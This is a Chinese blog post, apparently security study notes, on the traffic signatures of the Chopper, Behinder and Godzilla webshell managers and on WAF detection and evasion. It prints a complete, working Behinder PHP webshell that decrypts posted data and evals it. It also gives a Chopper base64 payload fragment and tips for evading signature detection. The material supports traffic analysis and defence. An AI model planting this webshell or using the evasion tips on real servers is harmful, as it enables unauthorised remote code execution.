WAF攻防-菜刀&冰蝎&哥斯拉&流量通讯&特征绕过&检测反制&感知

已于 2023-04-12 22:16:06 修改
阅读量1.4k 收藏 3
点赞数 1
分类专栏: Cyber-Security 文章标签: php 开发语言 waf 冰蝎
于 2023-04-12 22:12:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/130106166
版权

文章目录

使用Proxifier进行流量转发至Burp抓包分析(使用Wireshake也可以)

菜刀-流量&绕过&特征&检测

这里演示PHP Webshell

特征

1、版本
2011
在这里插入图片描述
2014

在这里插入图片描述
PHP chr() 函数 :根据十进制代码输出ASCII字符(详见ASCII码表)
在这里插入图片描述
2016
在这里插入图片描述
尝试写入文件,抓包分析
在这里插入图片描述
数据包流量特征:
1,请求包中:ua头为百度,火狐
2,请求体中存在eavl,base64等特征字符
3,请求体中传递的payload为base64编码,并且存在固定的base64编码段

QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

绕过

1.有少数时候eval方法会被assert方法替代。	#函数替换
2.$_POST也会被$_GET$_REQUEST替代。	
3.z0是菜刀默认的参数,这个地方也有可能被修改为其他参数名。	#更改默认参数名称

检测

针对于菜刀特征的正则表达式

冰蝎3-流量&绕过&特征&检测

面试必问的,别问我怎么知道的
冰蝎利用了服务器端的脚本语言加密功能,通讯的过程中,
消息体内容采用 AES 加密,基于特征值检测的安全产品无法查出

特征

密钥使用连接密码的md5结果的前16位 如果对方使用的默认密码rebeyond,那么密钥就是e45e329feb5d925b,那么这也算是一个特征
在这里插入图片描述
冰蝎内置UA头
在这里插入图片描述

    public static String[] userAgents = new String[]{"Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)", "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.2; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"};

以及初始化请求头部(这个要根据自己反编译的冰蝎版本来看,可能自己使用的已经是别人‘魔改’后的)
在这里插入图片描述

    private void initHeaders() {
        this.currentHeaders.put("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9");	
        this.currentHeaders.put("Accept-Encoding", "gzip, deflate, br");
        this.currentHeaders.put("Accept-Language", "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7");
        if (this.currentType.equals("php")) {
            this.currentHeaders.put("Content-type", "application/x-www-form-urlencoded");
        } else if (this.currentType.equals("aspx")) {
            this.currentHeaders.put("Content-Type", "application/octet-stream");
        } else if (this.currentType.equals("jsp")) {
            this.currentHeaders.put("Content-Type", "application/octet-stream");
        }

        this.currentHeaders.put("User-Agent", this.getCurrentUserAgent());	
        if (((String)this.currentHeaders.get("User-Agent")).toLowerCase().indexOf("firefox") >= 0) {
            this.currentHeaders.put("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
            this.currentHeaders.put("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2");
        }

        this.currentHeaders.put("Referer", this.getReferer());
    }

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b";		#连接密码(rebeyond)32位md5前16位
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

连接webshell后抓包解密(偏移量和密钥都是可以二次修改的,所以增加了检测的难度)
在这里插入图片描述

通讯过程

以代码Key为密匙的AES加密解密过程
在这里插入图片描述

检测

User-agent:代码中定义
Pragma: no-cache
Content-Type:application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7

绕过

二次魔改,修改默认header设置

哥斯拉-流量&绕过&特征&检测

特征

在这里插入图片描述
网上有哥斯拉解密异或的脚本……

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=rut2a51prso470jvfe2q502o44;  cookie最后面存在一个";"

在这里插入图片描述

Other

正则匹配 简单 容易被绕过 (加密 编码 分段)
机器语言
行为分析

入侵检测 IDS HIDS

An0nymouer
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
78、WAF攻防——菜刀&冰蝎&哥斯拉&流量通讯&特征绕过&检测反制&感知
qq_55202378的博客
04-07 351
菜刀——profier——burp:实现将菜刀流量转发到burp上。:大致加密密文跟base64差不多,只是base64会出现。
kingkong:解密哥斯拉webshell管理工具流量
04-16
kingkong 解密哥斯拉Godzilla-V2.96 webshell管理工具流量 目前只支持jsp类型的webshell流量解密 Usage 获取攻击者上传到服务器的webshell样本 获取wireshark之类的流量包,一般甲方有科来之类的全流量镜像设备,联系运维人员获取,这里以test.papng为例。 导出所有http对象,放置到文件夹 编辑kingkong.py脚本,找到#config这行,配置获取到的样本password、key,以及刚才的文件夹路径 py -2 kingkong.py Config #config #配置webshell的key key = '3c6e0b8a9c15224a' #配置webshell的password password = 'pass' #配置wireshark导出http对象的路径 filepath = '.' #配置是否为jsp+b
webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)
最新发布
qq_53058639的博客
06-10 925
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。在流量层,冰蝎的aes特征一直是厂商查杀的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,
WAF攻防第七十八天
B_l_a_nk的博客
07-07 439
1、菜刀-流量&通讯&检测&绕过 2、冰蝎-流量&通讯&检测&绕过 3、哥斯拉-流量&通讯&检测&绕过 代码块&传参数据&工具指纹等(表面&行为) 1、代码表面层免杀-ASP&PHP&JSP&ASPX等 2、工具行为层免杀-菜刀&蚁剑&冰蝎&哥斯拉
使用菜刀HTTP流量代理绕过WAF
focus on security
03-17 951
在实际的渗透测试中,Webshell真正免杀的第一步就是确保 Webshell 的源脚本免杀,其次是传输内容的编码混淆。 在实际的渗透过程中,我们常常因为WAF而头疼。源码免杀了而传输层却被拦截了实在难受。虽然现在很多优秀的应用。如蚁剑,C刀,冰蝎等。本文就通过在不修改程序源码,不重复造轮子,代码量最少的前提下实现类似冰蝎的加密传输。 但仅将 request 包内容进行编码,发送到服务器是远远不够的;部分 WAF 或者信息防泄漏系统还会对网页的 response 返回包流量进行检测。这时候,无论源.
初识哥斯拉流量
weixin_59343712的博客
07-11 582
到公司实习之后玩了玩应急响应平台流量监测平台,发现基于哥斯拉流量来进行上传攻击取得成功案例有多个,觉得有必要了解一下什么是哥斯拉流量,下面写一下对于哥斯拉流量的认识名叫“哥斯拉”的webshell管理工具,与冰蝎类似,哥斯拉也采用了加密流量通信来躲避WAF等安全设备的检测,另外该工具自带了一些插件模块,实现了写内存webshell、与Meterpreter联动、bypass open_basedir等功能。
冰蝎下的反弹shell连接msfconsole
热门推荐
Master先生的博客
01-07 5万+
文章目录前言一、使用木马getshell1.搭建环境二、冰蝎配置三、kali监听总结 前言 好久没碰美少妇(MSF)了,恰巧昨天在群里水群,有个表哥问为什么msf监听不到数据。为此我带着表哥的疑问进行了简单的研究。大体的流程和思路我简单记录一下。其中的坑还是不少的,希望这篇文章对初识冰蝎的表哥们有点用处。 一、使用木马getshell 冰蝎之所以强还是在于他的动态二进制加密。这里呢,在冰蝎下载的包中给出了官方的webshell。在server文件夹下。 这里呢,我踩过一个坑。不知道是我电脑配置的问题还是就
管理系统系列--CDN & WAF集群管理系统。.zip
02-25
管理系统系列--CDN & WAF集群管理系统。
第80天:红蓝对抗-AWD模式&准备&攻防&监控&批量1
08-03
- **流量监控**:结合文件监控,发现异常流量行为。 5. **攻击策略**: - **批量Flag获取**:编写脚本自动寻找和提交flag,保持权限并持续得分。 6. **案例分析**: - **案例1**:WAF部署需要根据环境(如编程...
ByPassWAF&注入-漏洞银行大咖面对面11-倾旋
07-31
ByPassWAF&注入-漏洞银行大咖面对面11-倾旋
精简&明文免杀冰蝎php一句话.php
10-30
php一句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf检测
suricata规则:Suricata IDS规则使用检测红队渗透恶意行为等,支持检测CobaltStrikeMSFEmpireDNS隧道Weevely菜刀冰蝎反弹shellICMP隧道等
02-06
suricata规则:Suricata IDS规则使用检测红队渗透恶意行为等,支持检测CobaltStrikeMSFEmpireDNS隧道Weevely菜刀冰蝎反弹shellICMP隧道等
CTF哥斯拉冰蝎解码工具
02-23
承影_哥斯拉冰蝎解码工具1.1版本,助力CTF比赛
WAF攻防实战笔记v1.0--Bypass.pdf
03-30
这份文档分为技巧篇和实战篇,技巧篇介绍了各种服务器、数据库、应用层、WAF层的特性,在实战篇中,我们将灵活运用各种技巧去绕过WAF防护。
Shell管理工具流量分析-下(冰蝎 3.0、哥斯拉 4.0 流量分析)
Love&Share
12-23 1万+
Shell管理工具流量分析-下(冰蝎 3.0、哥斯拉 4.0 流量分析)
冰蝎:命令执行操作的流量分析
weixin_52544058的博客
10-15 1846
冰蝎:命令执行操作的流量分析
哥斯拉流量特征已经检测思路
buffedon的博客
12-25 7228
哥斯拉流量特征已经检测思路WebShell上传特征WebShell通信特征1.User-Agent (弱特征)2.Accept(弱特征)3.Cookie (强特征)4.请求体特征 (较强特征)5.响应体特征 (强特征) 近日,网上发布了一款名为“哥斯拉”的webshell管理工具。与冰蝎类似,哥斯拉也采用了加密流量通信来躲避WAF等安全设备的检测,另外该工具自带了一些插件模块,实现了写内存webshell、与Meterpreter联动、bypass open_basedir等功能。由于哥斯拉实现了众多强大的
拿webshell_某系统绕过waf拿下webshell
weixin_42401178的博客
12-26 598
文章来源:安全先师前言对于一个不怎么拿站的我来说搞一次站点确实费劲。前不久拿了一个站点。分享一下粗略过程。正文小伙伴所在的地方要让搞某系统测试,发到群里让看看。我看了一波貌似没有什么洞洞这让我,想起三年前的某系统的算算术的漏洞于是,想搞一份源代码研究一下这个算算术的这个东东于是操起神器在fofa上找到一个站的可以算算术接下来掏出exp就开始怼。结果显示如下。连接被重置了想到的是某x云。结...
流量分析--------webshell工具冰蝎原理
qq_36448110的博客
05-12 3213
冰蝎菜刀哥斯拉是webshell管理工具,比较出名,也被经常使用。之前只知道冰蝎经过加密,具体原理不是很清楚。 我想如果我是蓝方的成员,如果能懂这里面·的传输原理,是不是就能在流量分析,在底层的时候就给与阻挡,杜绝危机。 所以今天就来仔细研究以下: 1.首先宿主机10.77是攻击者,虚拟机是受害者10.222,事先上传号木马文件 2.打开冰蝎和抓包软件(科来进行抓包) 3.双击连接,进行抓包 原理分析: 1.按理来说上传shell之后,第一次应该有个客户端和服务器之间交换aes密钥的环节,但是没
实战绕过双重waf(玄武盾+程序自身过滤)结合编写sqlmap的tamper获取数据.pdf
03-24
实战绕过双重waf 玄武盾+程序自身过滤 结合编写sqlmap的tamper获取数据 文档来自互联网仅做学习使用,请勿使用文档相关内容进行违法犯罪活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值